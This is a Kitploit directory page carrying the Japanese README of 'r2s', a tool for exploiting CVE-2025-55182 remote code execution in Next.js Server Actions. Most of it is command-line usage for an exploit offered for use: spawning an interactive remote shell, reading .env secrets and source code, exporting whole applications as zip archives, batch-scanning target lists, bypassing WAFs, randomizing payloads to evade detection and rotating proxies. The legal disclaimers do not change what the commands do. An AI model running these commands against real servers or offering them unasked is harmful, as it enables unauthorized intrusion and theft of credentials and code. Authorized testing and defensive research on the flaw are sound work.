Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
r2s — Next.jsアプリケーションにおけるCVE-2025-55182脆弱性評価のための高度なセキュリティテストツール。機能: インタラクティブシェル、バッチスキャン、WAFバイパス、包括的なレポート。 | Kitploit
ツール/GitHubGitHub/zamdevio/r2s
脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用情報収集WAFバイパスペネトレーションテストコマンド&コントロール
GitHubzamdevio/r2s

r2s

Next.jsアプリケーションにおけるCVE-2025-55182脆弱性評価のための高度なセキュリティテストツール。機能: インタラクティブシェル、バッチスキャン、WAFバイパス、包括的なレポート。

リポジトリを見る
28ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

React2Shell (R2S) - CVE-2025-55182 テストツール

R2S Banner Python License

CVE-2025-55182 脆弱性評価のための高度なエクスプロイトテストツール

機能 • インストール • 使い方 • テスト環境 • 法的免責事項


📖 R2Sとは?

R2S (React2Shell) は、セキュリティ研究者、開発者、ペネトレーションテスターがNext.jsアプリケーションがCVE-2025-55182に対して脆弱かどうかを評価できるように設計されたセキュリティテストツールです。

CVE-2025-55182 について

CVE-2025-55182 は、特定のバージョン(例:16.0.5)のNext.js Server Actionsに影響を与える重大な脆弱性です。この脆弱性により、攻撃者は適切に保護されていないServer Actionsを通じてサーバー上で任意のコマンドを実行でき、リモートコード実行(RCE)につながります。

R2S は、悪意のある攻撃者に見つかる前に修正できるよう、アプリケーションにこの問題があるかどうかを確認するのに役立ちます。


⚠️ 重要な注意事項

Windows コマンドフラグ (--windows)

⚠️ 重要警告: --windows フラグを誤って使用すると、ツールが脆弱性の判定に失敗する可能性があります。

  • デフォルトの動作: ツールはUnix/Linuxコマンドを使用します(ほとんどのNext.jsサーバーはLinux上で動作します)
  • --windowsを使用する場合: ターゲットサーバーがWindowsであると100%確信できる場合のみ
  • 誤った場合の結果: Linuxサーバーで--windowsを使用するとコマンドが失敗し、サーバーが脆弱であっても「脆弱ではない」と報告される可能性があります
  • ベストプラクティス: ツールにプラットフォームを自動検出させるか、ターゲットがWindowsであると分かっていない限り--windowsを使用しないでください

例:```bash

❌ WRONG - Using --windows on a Linux server

r2s -u http://linux-server.com -t --windows

Result: Commands fail, tool may report "not vulnerable" (FALSE NEGATIVE)

✅ CORRECT - Let tool use default Unix/Linux commands

r2s -u http://linux-server.com -t

Result: Proper detection of vulnerability

root@kitploit:~
---
---

## ⚠️ 法的免責事項

**重要:このツールを使用する前に必ずお読みください**

1. **このツールは正当なセキュリティテスト専用です**
   - ✅ 自分のアプリケーションをテストする
   - ✅ 書面による許可を得たアプリケーションをテストする
   - ✅ 教育目的およびセキュリティ研究
   - ❌ **自分が所有していない、またはテストする許可を得ていないシステムでは決して使用しないでください**
   - ❌ **悪意のある目的では決して使用しないでください**

2. **このツールを使用することで、以下に同意したことになります:**
   - 自分が所有しているか、テストするための明示的な書面による許可を得ているシステムでのみ使用すること
   - コンピュータシステムへの無許可アクセスが违法であることを理解していること
   - 自身の行動に対して全責任を負うこと
   - 作者はこのツールの誤用に対する責任を負わないこと

3. **法的影響:**
   - コンピュータシステムへの無許可アクセスはほとんどの国で犯罪です
   - 刑事告訴、罰金、禁固刑を受ける可能性があります
   - テスト前には常に書面による許可を得てください

4. **このツールは「現状のまま」提供され、いかなる種類の保証もありません**

**18歳未満の場合は、このツールを使用する前に成人の監督と許可を得てください。**

---

## ✨ 特徴

### コア機能
- 🔍 **脆弱性検出** - サーバーがCVE-2025-55182に対して脆弱かどうかを迅速にテスト
- 💻 **インタラクティブシェル** - HTTPS経由の完全なインタラクティブシェルセッション。コマンド履歴付き
- 📁 **ファイル操作** - ディレクトリの一覧表示、ファイルの読み取り、ファイル/アーカイブのエクスポート
- 🔐 **シークレット抽出** - アプリケーションのシークレット(.envファイル、設定ファイル)の読み取りを試行
- 📄 **コード抽出** - アプリケーションのソースコードの読み取りを試行
- 🖥️ **システム情報** - OS情報、ホスト名、ユーザー、環境変数を収集

### 高度な機能
- 🚀 **自動ウォームアップペイロード** - 最良の結果を得るためにペイロードを自動最適化
- ⚡ **並列実行** - 複数のコマンドを同時に実行
- 🎲 **ペイロードランダム化** - 動的ペイロードで検出を回避
- 🛠️ **エクスプロイトモジュール** - Metasploitスタイルのモジュールシステム (env_dump, file_search, network_scan, process_list)
- 🔄 **リダイレクト処理** - HTTPリダイレクト (301, 302, 303, 307, 308) を自動フォロー
- 🎨 **美しいUI** - 読みやすさのための色分けされた出力
- 📊 **包括的なレポート** - 操作固有のフォーマッタでJSON、HTML、TXT形式のレポートを自動保存
- ⚙️ **設定システム** - インタラクティブな設定パネルを備えたJSONベースの設定
- 📦 **エクスポート機能** - 単一ファイルまたはアプリ全体のディレクトリをzipアーカイブとしてエクスポート
- 🔒 **WAFバイパス** - 複数のバイパス手法 (⚠️ 保証なし - 以下の制限事項を参照)

### レポートとログ記録
- 📝 **自動レポート保存** - 人間が読めるタイムスタンプでレポートを `~/.r2s/reports/` に自動保存
- 📋 **操作固有のフォーマット** - 異なる操作(シェル、テスト、シークレットなど)ごとに異なるレポート形式
- 📜 **コマンド履歴** - `~/.r2s/history` に保存される永続的なコマンド履歴
- 🔍 **監査証跡** - 全操作の詳細なログを `~/.r2s/logs/audit.log` に記録
- 🎨 **HTMLレポート** - ダーク/ライトモード、コピーボタン、コードブロックを備えた美しいHTMLレポート

---

## 📦 インストール

### オプション1: ソースからビルド(推奨)

1. **リポジトリをクローン:**   ```bash
   git clone https://github.com/zamdevio/r2s.git
   cd r2s
  1. 依存関係をインストール: ```bash pip install -r requirements.txt
    root@kitploit:~
  2. スタンドアロンバイナリをビルドする: ```bash ./build.sh
    root@kitploit:~
  3. システムにインストール(オプション): ```bash sudo cp dist/r2s /usr/local/bin/ sudo chmod +x /usr/local/bin/r2s
    root@kitploit:~
  4. ビルドアーティファクトのクリーンアップ(オプション): ```bash

    Remove build/, dist/, pycache/, and other build files

    ./build.sh cleanup
    root@kitploit:~

オプション2: Pythonスクリプトを直接使用する```bash

Install dependencies

pip install -r requirements.txt

Run directly

python3 -m react2shell.main --help

Or after building:

r2s --help

root@kitploit:~
---
## 🚀 クイックスタート

### 基本的な脆弱性テスト```bash
# Test if a server is vulnerable
r2s -u http://localhost:3000 -t

# With verbose output for more details
r2s -u http://localhost:3000 -t -v

⚠️ 重要: ターゲットがWindowsであると確信できない限り、--windows を使用しないでください。Linuxサーバーで --windows を使用すると、偽陰性が発生する可能性があります(サーバーが脆弱であってもツールが「脆弱ではない」と報告する場合があります)。

オンラインデモでテストする

安全なテスト環境を https://r2s-arena.fly.dev で提供しています:```bash

Test the online demo

r2s -u https://r2s-arena.fly.dev -t

root@kitploit:~
### ローカルでのテスト

脆弱なアプリをローカルで実行する手順については、[`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) を参照してください。

---

## 📚 使用例

### クイックコマンドリファレンス

**最も一般的なコマンド:**
- `r2s -u URL -t` - 脆弱性のテスト(最も一般的)
- `r2s -u URL --shell` - インタラクティブシェルを起動
- `r2s --targets FILE -t` - 複数のターゲットを一括スキャン
- `r2s -u URL --system-info` - システム情報を取得
- `r2s -u URL --secrets` - シークレットの読み取りを試行
- `r2s -u URL --export-archive` - アプリ全体をZIPとしてエクスポート

**⚠️ 注意**:ターゲットがWindowsでない限り、`--windows` を使用しないでください!

---

### 基本操作```bash
# Test vulnerability
r2s -u http://localhost:3000 -t

# List directory contents
r2s -u http://localhost:3000 --list-dir /app

# Read files
r2s -u http://localhost:3000 --read-file .env
r2s -u http://localhost:3000 --read-file package.json

# Get system information
r2s -u http://localhost:3000 --system-info

# Execute custom commands
r2s -u http://localhost:3000 --command "whoami"
r2s -u http://localhost:3000 --command "uname -a"

インタラクティブシェル```bash

Start interactive shell session

r2s -u http://localhost:3000 --shell

Features:

- Arrow keys for command history (↑/↓)

- Arrow keys for cursor movement (←/→)

- Command aliases: nano/vi/vim/emacs → cat, clear → cls

- Colored file/folder output in ls

- Persistent history saved to ~/.r2s/history

- Auto-save shell session reports

root@kitploit:~
### エクスプロイトモジュール```bash
# List available modules
r2s --list-modules

# Use a module
r2s -u http://localhost:3000 --module env_dump

# Use module with options
r2s -u http://localhost:3000 --module file_search --set pattern="*.env" --set path="/app"

# Get module information
r2s --module-info env_dump

エクスポート機能```bash

Export a single file

r2s -u http://localhost:3000 --export src/app/page.tsx

Saved to: ~/.r2s/exports/{domain}/src/app/page.tsx

Export entire app directory as zip archive

r2s -u http://localhost:3000 --export-archive

What it does:

- Creates a zip archive of the entire app directory on the server

- Automatically excludes files matching .gitignore patterns

- Downloads the archive to your local machine

- Automatically deletes the archive from the server after download

- Saved to: ~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip

Note: This operation may take a while for large applications

Configure export directory

r2s settings

Navigate to "export" section and set "export_dir"

root@kitploit:~
### シークレット & コード抽出```bash
# Attempt to read application secrets
r2s -u http://localhost:3000 --secrets
# Tries: .env, .env.local, .env.production, config.json, etc.

# Attempt to read application source code
r2s -u http://localhost:3000 --code
# Tries: src/**/*.ts, src/**/*.tsx, src/**/*.js, etc.

バッチスキャン(複数ターゲット)```bash

Scan multiple targets from file (one URL per line)

r2s --targets targets.txt -t

Batch mode: no interactive prompts, auto-continue

r2s --targets targets.txt --batch -t

Scan with rate limiting (2 requests per second)

r2s --targets targets.txt -t --rate 2

Add delay between targets (1 second)

r2s --targets targets.txt -t --delay 1

Combine options for safe batch scanning

r2s --targets targets.txt --batch -t --rate 1 --delay 2

root@kitploit:~
### 高度なオプション```bash
# Parallel execution (run multiple commands simultaneously)
r2s -u http://localhost:3000 --parallel 5 --command "whoami;id;uname -a"

# WAF bypass (⚠️ Not guaranteed - see limitations below)
r2s -u http://localhost:3000 -t --waf-bypass

# Auto-warm payloads (optimize payloads before execution)
r2s -u http://localhost:3000 -t --auto-warm

# Randomize payloads (evade static detection)
r2s -u http://localhost:3000 --command "whoami" --randomize

# Different header strategies
r2s -u http://localhost:3000 -t --header-strategy chrome_latest
# Options: default, chrome_latest, firefox, minimal, assetnote

# Custom timeout (0 = no timeout)
r2s -u http://localhost:3000 --command "long-running-command" --timeout 0

# Disable SSL verification
r2s -u https://target.com -t --insecure

# Rate limiting (requests per second)
r2s -u http://localhost:3000 -t --rate 2

# Delay between requests (seconds)
r2s -u http://localhost:3000 --command "whoami" --delay 1

プロキシ & ネットワーク オプション```bash

Use HTTP proxy

r2s -u http://localhost:3000 -t --proxy http://proxy.example.com:8080

Use proxy with authentication

r2s -u http://localhost:3000 -t --proxy http://user:[email protected]:8080

Load and rotate proxies from file (one proxy per line)

r2s -u http://localhost:3000 -t --proxy-file proxies.txt

Rate limiting with proxy rotation

r2s --targets targets.txt -t --proxy-file proxies.txt --rate 1

root@kitploit:~
### ログ記録と監査```bash
# Log all operations to specific file
r2s -u http://localhost:3000 -t --log r2s_session.log

# Create detailed audit trail (saved to ~/.r2s/logs/audit.log)
r2s -u http://localhost:3000 -t --audit

# Combine logging with batch scanning
r2s --targets targets.txt --batch -t --log batch_scan.log --audit

設定と構成```bash

Open interactive settings panel

r2s settings

Configure:

- Report formats (JSON, HTML, TXT per operation)

- Auto-save reports (on/off)

- Export directory

- Default timeouts

- And more...

Clean up all tool data

r2s cleanup

Removes: config, history, logs, reports, exports

Uninstall the tool (standalone binaries only)

r2s uninstall

root@kitploit:~
### 報告```bash
# Reports are auto-saved to ~/.r2s/reports/ by default
# Format: {operation}_{YYYYMMDD_HHMMSS}.{json,html,txt}

# Disable auto-save
r2s -u http://localhost:3000 -t --no-report

# Save to specific location (disables auto-save)
r2s -u http://localhost:3000 -t --output /path/to/report.json

# View reports
ls ~/.r2s/reports/
cat ~/.r2s/reports/test_20251206_120000.html

🎯 一般的なユースケース

1. 自身のアプリケーションのテスト```bash

Start your Next.js app

cd my-nextjs-app npm run dev

In another terminal, test it

r2s -u http://localhost:3000 -t

root@kitploit:~
### 2. セキュリティ監査```bash
# Comprehensive security check
r2s -u http://localhost:3000 -t --waf-bypass
r2s -u http://localhost:3000 --system-info
r2s -u http://localhost:3000 --secrets
r2s -u http://localhost:3000 --code
r2s -u http://localhost:3000 --export-archive

3. 教育用テスト

安全なローカルテストのために、提供されている nextjs アプリケーションを使用してください。```bash cd nextjs npm install npm run dev

Test in another terminal

r2s -u http://localhost:3000 -t

root@kitploit:~
詳細な手順については[`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md)を参照してください。

---

## 🏗️ アーキテクチャ

R2Sは、保守性と拡張性を考慮したモジュラーアーキテクチャを採用しています:```
react2shell/
├── main.py              # Main entry point
├── classes/             # Core classes
│   ├── detector.py     # Target detection
│   ├── executor.py     # Command execution
│   ├── modules.py      # Exploit modules system
│   ├── operations.py   # High-level operations
│   ├── payload.py      # Payload building and randomization
│   └── shell.py        # Interactive shell
├── services/            # Services
│   ├── config.py       # Configuration management (JSON)
│   ├── exporter.py     # File and archive export
│   ├── formatters.py   # Report formatters
│   ├── history.py      # Command history
│   ├── logger.py       # Logging and audit trails
│   ├── proxy.py        # Proxy management
│   └── reporter.py     # Report generation
└── utils/              # Utilities
    ├── colors.py       # Color utilities
    └── helpers.py      # Helper functions

react2shell/README.md を参照して、詳細なアーキテクチャ文書をご確認ください。


🧪 テスト環境

実際のシステムにリスクを負わせることなくツールをテストできる、安全なテスト環境 nextjs を提供しています。

オンラインデモ

アクセス先: https://r2s-arena.fly.dev

これは公開されている、テスト目的のみの意図的に脆弱なアプリケーションです。

ローカルテスト

ローカルで実行する手順については、nextjs/README.md を参照してください。

⚠️ 重要: nextjs アプリケーションは意図的に脆弱であり、本番環境や実際のデータで決して使用しないでください。


📖 コマンドリファレンス

基本コマンド

エクスポートコマンド

コマンド説明
--export FILE, --ex FILEターゲットから単一ファイルをエクスポート(~/.r2s/exports/{domain}/ に保存)
--export-archiveアプリディレクトリ全体をzipアーカイブとしてエクスポート。サーバー上でzipを作成し、ダウンロード後にサーバーから削除。.gitignoreパターンを除外。~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip に保存

モジュールコマンド

コマンド説明
--module NAMEエクスプロイトモジュールを実行
--module-list, --list-modules利用可能なモジュールを一覧
--module-info NAME

高度なオプション

レポートオプション

オプション説明
--output FILE, -o FILE結果を特定のファイルに保存(自動保存を無効化)
--no-report~/.r2s/reports/ への自動レポート保存を無効化

ネットワーク&プロキシオプション

バッチ&自動化オプション

オプション説明
--targets FILEファイルから複数ターゲットをスキャン(1行に1URL、#でコメント対応)
--batchバッチモード: すべてのインタラクティブプロンプトをスキップし自動継続(自動化/スクリプトに便利)

特殊コマンド

コマンド説明
r2s settingsインタラクティブ設定パネルを開く
r2s cleanupR2Sの全データ(設定、履歴、ログ、レポート、エクスポート)を削除
r2s uninstall

🔧 トラブルシューティング

"SSL Error"```bash

Use --insecure flag to bypass SSL verification

r2s -u https://target.com -t --insecure

root@kitploit:~
### "接続エラー"
- サーバーが稼働しているか確認
- URLが正しいか確認
- ファイアウォール設定を確認
- タイムアウトを増やしてみる: `--timeout 30`

### "リクエストがブロックされました"```bash
# Try WAF bypass (⚠️ Not guaranteed - see WAF Bypass Limitations below)
r2s -u https://target.com -t --waf-bypass

# Try different header strategies
r2s -u https://target.com -t --header-strategy chrome_latest
r2s -u https://target.com -t --header-strategy firefox

「脆弱性を特定できない」または誤検知(False Negatives)

⚠️ 重要: Windows コマンドフラグ

偽陰性(ツールが「脆弱ではない」と表示するが、実際は脆弱である)が発生する場合は、以下を確認してください:

  1. --windows フラグを使用しましたか?

    • --windows フラグを使用すると、ツールは Windows コマンド(PowerShell、dir など)を使用します。
    • ターゲットが Unix/Linux(ほとんどの Next.js サーバーはこれに該当)の場合、--windows を使用するとツールは失敗します。
    • ツールは Linux サーバー上で Windows コマンドを実行しようとし、失敗します。
    • 解決策: --windows フラグを削除してください(Unix/Linux がデフォルトです)。
  2. プラットフォームの検出

    • ツールは自動的にプラットフォームを検出しますが、上書きすることもできます。
    • ターゲットが Windows であることが100%確実な場合のみ --windows を使用してください。
    • ほとんどの Next.js デプロイメントは Linux/Unix システム上にあります。
  3. テストコマンド

    • デフォルトのテストでは Unix コマンドを使用します:echo $((41*271))
    • --windows を使用すると、次のコマンドを使用します:powershell -c "41*271"
    • サーバーが Linux であるにもかかわらず Windows コマンドを使用すると、テストは失敗します。

問題の例:```bash

❌ WRONG - This will fail if target is Linux

r2s -u http://linux-server.com -t --windows

✅ CORRECT - Let tool auto-detect or use default (Unix/Linux)

r2s -u http://linux-server.com -t

root@kitploit:~
### WAFバイパスの制限

**⚠️ 重要:** 本ツールのWAFバイパス手法は**動作を保証するものではなく**、以下のような制限があります。

- **普遍性なし**: WAFによって検出方法は異なります。あるWAFで有効でも別のWAFでは無効な場合があります。
- **静的検出**: 一部のWAFはバイパス可能な静的パターンマッチングを使用しますが、最新のWAFは行動分析を使用します。
- **レート制限**: 多くのWAFはレート制限を実装しており、繰り返しの試行をブロックする可能性があります。
- **機械学習**: 高度なWAFは攻撃パターンに適応・学習するMLモデルを使用します。
- **Cloudflare/AWS WAF**: エンタープライズグレードのWAF(Cloudflare、AWS WAFなど)はバイパスが極めて困難です。
- **保証なし**: バイパス手法は実験的なものであり、適切に設定されたWAFに対しては失敗する可能性があります。

**ベストプラクティス:**
- WAFバイパスは最後の手段として使用する
- 異なるヘッダー戦略(`--header-strategy`)を試す
- より良い結果を得るために`--randomize`と組み合わせる
- 一部のターゲットはバイパス不可能である可能性を理解する
- 常に自身が所有する、またはテスト許可を得たシステムでのみテストする

### ビルドの問題```bash
# Make sure Python 3.7+ is installed
python3 --version

# Install dependencies
pip install -r requirements.txt

# Clean previous build artifacts
./build.sh cleanup

# Try building again
./build.sh

ビルドアーティファクトのクリーンアップ

ビルドアーティファクト(ビルドディレクトリ、キャッシュファイルなど)を安全に削除するには:```bash ./build.sh cleanup

root@kitploit:~
これにより削除されます:
- `build/` ディレクトリ (PyInstaller ビルドファイル)
- `dist/` ディレクトリ (コンパイル済みバイナリ)
- `__pycache__/` ディレクトリ (Python キャッシュ、再帰的)
- `*.pyc` ファイル (コンパイル済み Python バイトコード)
- `*.pyo` ファイル (最適化された Python バイトコード)
- `*.spec` ファイル (PyInstaller 仕様ファイル)

**注:** これはビルド成果物のみを削除し、ソースコードは削除しません。クリーンアップは安全で、続行する前に確認を求めます。

---

## 📁 ファイル構造```
r2s/
├── README.md                 # This file
├── LICENSE                   # MIT License
├── requirements.txt          # Python dependencies
├── build.sh                  # Build script for standalone binary
├── r2s_entry.py              # PyInstaller entry point
├── react2shell/              # Main package
│   ├── README.md            # Architecture documentation
│   ├── main.py              # Entry point
│   ├── classes/             # Core classes
│   ├── services/            # Services
│   └── utils/               # Utilities
└── nextjs/                   # Testing environment
    └── README.md            # Testing environment documentation

🤝 貢献

コントリビューションを歓迎します!以下を参照してください:

  1. リポジトリをフォーク
  2. 機能ブランチを作成
  3. 変更を加える
  4. プルリクエストを送信

注意: 正当なセキュリティテストに役立つコードのみをコントリビュートしてください。


📝 ライセンス

このプロジェクトはMITライセンスの下でライセンスされています。詳細はLICENSEファイルを参照してください。

ただし、このツールの使用は上記の法的免責事項に従います。このツールを不正アクセスに使用することは違法であり、このライセンスの対象外です。


👨‍💻 開発者

zamdevio

  • GitHub: https://github.com/zamdevio
  • Project Repository: https://github.com/zamdevio/r2s

🙏 謝辞

  • CVE-2025-55182を発見したセキュリティ研究者
  • オープンソースセキュリティコミュニティ
  • このプロジェクトへのすべてのコントリビューター

📞 サポート

  • 問題報告: GitHub Issues
  • セキュリティ: セキュリティ問題は責任を持って報告してください

⚠️ 最終注意事項

このツールはセキュリティテストおよび教育目的のみに使用してください。

  • ✅ テスト前には必ず許可を得る
  • ✅ 自分が所有する、またはテスト許可のあるシステムのみテストする
  • ✅ 責任を持ち倫理的に使用する
  • ❌ 悪意のある目的で決して使用しない
  • ❌ 許可なくシステムをテストしない

法令順守、倫理的、安全に行動しましょう!🛡️


セキュリティコミュニティのために❤️を込めて

⬆ Back to Top

ツールをダウンロード
コマンド説明
-u, --url URL対象URL(ほとんどの操作で必須)
-t, --testサーバーが脆弱かどうかをテスト
-ld, --list-dir PATHディレクトリ内容を一覧表示
-rf, --read-file FILEファイル内容を読み取り
-si, --system-infoシステム情報を取得
-sr, --secretsシークレットの読み取りを試行
-c, --codeソースコードの読み取りを試行
-cmd, --command CMDカスタムコマンドを実行
--shellインタラクティブシェルを開始
モジュール情報を表示
--set KEY=VALUEモジュールオプションを設定
オプション説明
--waf-bypassWAF回避テクニックを試行(⚠️ 保証はありません - 以下の制限事項を参照)
--waf-bypass-size KBWAF回避用ジャンクデータサイズ(KB単位、デフォルト: 128)
--vercel-waf-bypassVercel固有のWAF回避テクニックを有効化
--header-strategy STRATEGYHTTPヘッダー戦略: default、chrome_latest、firefox、minimal、assetnote
--parallel NN個のコマンドを並列実行(複数コマンドに便利)
--auto-warm実行前に自動的にペイロードをウォーミングアップして最適化
--randomizeペイロードをランダム化して静的検出を回避
--no-follow-redirectsHTTPリダイレクト(301、302など)を自動的にフォローしない
-k, --insecureSSL証明書検証を無効化(注意して使用)
--timeout SECONDSリクエストタイムアウト(秒単位、デフォルト: 10、0でタイムアウトなし)
--windows⚠️ 警告: Unix/LinuxではなくWindowsコマンドを使用します。ターゲットが実際にUnix/Linuxの場合、ツールが脆弱性の判定に失敗する可能性があります。ターゲットがWindowsであると確信している場合のみ使用してください。
--rate RATE1秒あたりRATEリクエストに制限(バッチスキャンに便利)
--delay SECONDSリクエスト間に遅延を追加(秒単位、レート制限回避に役立つ)
--batchバッチモード: すべてのインタラクティブプロンプトをスキップし自動継続(自動化に便利)
--log FILE
すべての操作を指定ファイルに記録(詳細な操作ログ)
--audit詳細な監査証跡を作成(~/.r2s/logs/audit.log に保存)
オプション説明
--proxy URLHTTPプロキシを使用(形式: http://proxy:port または http://user:pass@proxy:port)
--proxy-file FILEファイルからプロキシを読み込みローテーション(1行に1プロキシ、形式: http://proxy:port)
--rate RATE1秒あたりRATEリクエストに制限(ターゲットへの過負荷を防止)
--delay SECONDSリクエスト間に遅延を追加(秒単位、レート制限回避に役立つ)
R2Sバイナリと全データをアンインストール
r2s helpヘルプメッセージを表示